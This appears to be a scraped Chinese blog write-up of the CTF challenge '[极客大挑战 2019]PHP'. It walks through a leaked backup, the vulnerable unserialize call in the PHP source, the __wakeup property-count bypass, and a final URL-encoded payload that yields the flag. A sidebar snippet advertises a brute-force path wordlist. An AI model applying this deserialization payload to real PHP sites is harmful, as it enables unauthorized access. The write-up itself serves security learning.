极客大挑战2019php,[极客大挑战 2019]PHP

最新推荐文章于 2023-01-17 14:44:18 发布
最新推荐文章于 2023-01-17 14:44:18 发布
阅读量98 收藏
点赞数
文章标签: 极客大挑战2019php

标签:spl   payload   sorry   min   private   lob   audio   ascii   sel

题目上说有备份的好习惯,扫描目录得到www.zip

几个重要php文件内容:

index.php

1 php2 include ‘class.php‘;3 $select = $_GET[‘select‘];4 $res=unserialize(@$select);5 ?>

代码第4行unserialize可能存在反序列化漏洞

class.php

1 php2 include ‘flag.php‘;3 error_reporting(0);4 className{5 private $username = ‘nonono‘;6 private $password = ‘yesyes‘;7

8 public function __construct($username,$password){9 $this->username = $username;10 $this->password = $password;11 }12

13 function__wakeup(){14 $this->username = ‘guest‘;15 }16

17 function__destruct(){18 if ($this->password != 100) {19 echo "NO!!!hacker!!!";20 echo "You name is: ";21 echo $this->username;echo "";22 echo "You password is: ";23 echo $this->password;echo "";24 die();25 }26 if ($this->username === ‘admin‘) {27 global $flag;28 echo $flag;29 }else{30 echo "hello my friend~~sorry i can‘t give you the flag!";31 die();32 }33 }34 }35 ?>

代码第26行如果username为admin便输出flag,从__destruct,__construct,__wakeup可以判断存在反序列化漏洞

php序列化与反序列化

序列化:函数为serialize(),把复杂的数据类型压缩到一个字符串中 数据类型可以是数组,字符串,对象等

反序列化:函数为unserialize(),将字符串转换成变量或对象的过程

常用的内置方法:

__construct():创建对象时初始化,当一个对象创建时被调用

__wakeup() 使用unserialize时触发

__sleep() 使用serialize时触发

__destruction():结束时销毁对象,当一个对象销毁时被调用

我们需要将Name类序列化的结果输出

phpclassName{private $username = ‘nonono‘;private $password = ‘yesyes‘;public function __construct($username,$password){$this->username = $username;$this->password = $password;

}

}$a = new Name(‘admin‘,100);$b = serialize($a);echo $b;

输出结果为

O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";i:100;}

输出结果中Name和username,Name和password之间是有不可见字符的,因为private 声明的字段为私有字段,只在所声明的类中可见,在该类的子类和该类的对象实例中均不可见。因此私有字段的字段名在序列化时,类名和字段名前面都会加上ascii为0的字符(不可见字符)

另外我们还需要绕过__wakeup方法

在反序列化字符串时,属性个数的值大于实际属性个数时,会跳过 __wakeup()函数的执行

原本:O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";i:100;}

绕过:O:4:"Name":3:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";i:100;}

所以payload为:

?select=O:4:%22Name%22:3:{s:14:%22%00Name%00username%22;s:5:%22admin%22;s:14:%22%00Name%00password%22;i:100;}

[极客大挑战 2019]PHP

标签:spl   payload   sorry   min   private   lob   audio   ascii   sel

侍酒师小田
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
极客发卡网(集成极客支付免签)
11-22
【标题】"极客发卡网(集成极客支付免签)" 描述了一个在线发卡平台,该平台集成了极客支付系统,允许商家快速、便捷地进行电子卡密的发放,同时提供了低费率的支付解决方案。这个系统对商家来说具有较高的吸引力,...
极客学院2017全套视频学习资料
03-30
提供极客学院2017学习视频资料,包括html,JavaScript,PHP,数据库,实战路径图、知识体系图等,需要的小伙伴赶快拿去吧!
[极客挑战 2019]PHP
夜幕下的灯火阑珊的博客
05-12 535
知识点 源码泄露 反序列化 题目提示备份文件, 使用webscan工具扫描一下备份文件 py -2 main.py -u http://88bf6495-760a-4a63-aec1-7d1a3a9d9d0c.node3.buuoj.cn/ 扫描得到www.zip文件 解压得到index.php文件和class.php <?php include 'class.php'; $select = $_GET['select']; $res=unserialize(@$sele
在线扫雷游戏php源码.rar
04-29
在互联网时代,将这样的游戏转化为在线版本,可以利用PHP语言实现。PHP是一种广泛用于Web开发的服务器端脚本语言,它能高效地处理动态内容,非常适合构建网页应用。 这个“在线扫雷游戏php源码.rar”压缩包中包含了...
phpadmin及php爆破路径收集字典
07-13
phpadmin及php爆破路径收集字典,网络安全,字典,软件
极客学院web前端开发学习教程
05-25
包含bootstrap、html5、php、web前端开发,百度网盘地址
[极客挑战 2019]PHP 1
m0_62879498的博客
04-12 6406
[极客挑战 2019]PHP 1 一进入题目,就有页面提示我们“所以我有一个良好的备份网站的习惯” 所以我们尝试着输入网站源码备份文件,看看能否访问 常见的网站源码备份文件后缀: tar.gz,zip,rar,tar 常见的网站源码备份文件名: web,website,backup,back,www,wwwroot,temp 发现www.zip可以成功获得网站源码备份 下载后,发现有3个php文件 我们先访问一下 index.php文件,发现: <?php include 'clas
极客挑战php
weixin_52780973的博客
08-03 677
buuctf中的php
[极客挑战 2019]PHP1 writeup
dlccom的博客
04-20 196
打开网站之后看到个小猫很可爱 右键查看网页源码发现
极客挑战 2019PHP
Lixunzhe0112的博客
01-17 177
在上面的class中有一个 __wakeup() 方法,调用反序列化函数的时候会先调用了 __wakeup() 方法,但是这个方法有个缺陷,就是当参数的个数大于实际参数个数的时候就可以跳过执行 __wakeup() 方法。在类外部使用 serialize() 函数进行序列化的时候,会先调用类内部的 __sleep() 方法,同理在调用 unserialize() 函数的时候会先调用 __wakeup() 方法。//注意方框代表空格,直接在浏览器中复制的序列化没有空格。下面给出解释,这里并不是空格。
buuctf 极客挑战2019php
最新发布
08-24
buuctf 极客挑战2019php是指buuctf举办的一个PHP编程比赛,它是基于阿里云IoT技术平台的创新挑战赛。在该比赛中,参赛者需要利用PHP编写代码解决一系列技术难题。这些问题可能涉及到序列化、反序列化、变量值的展示等。序列化是指将对象转化为字符串的过程,而反序列化则是将字符串转化为对象的过程。在PHP中,可以使用serialize()函数进行序列化,并使用var_dump()函数进行反序列化结果的展示。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [阿里云IoT极客创新挑战赛.pdf](https://download.csdn.net/download/weixin_38744375/11634853)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* *3* [【BUUCTF-Web】 [极客挑战 2019]PHP](https://blog.csdn.net/m0_51683653/article/details/126693573)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值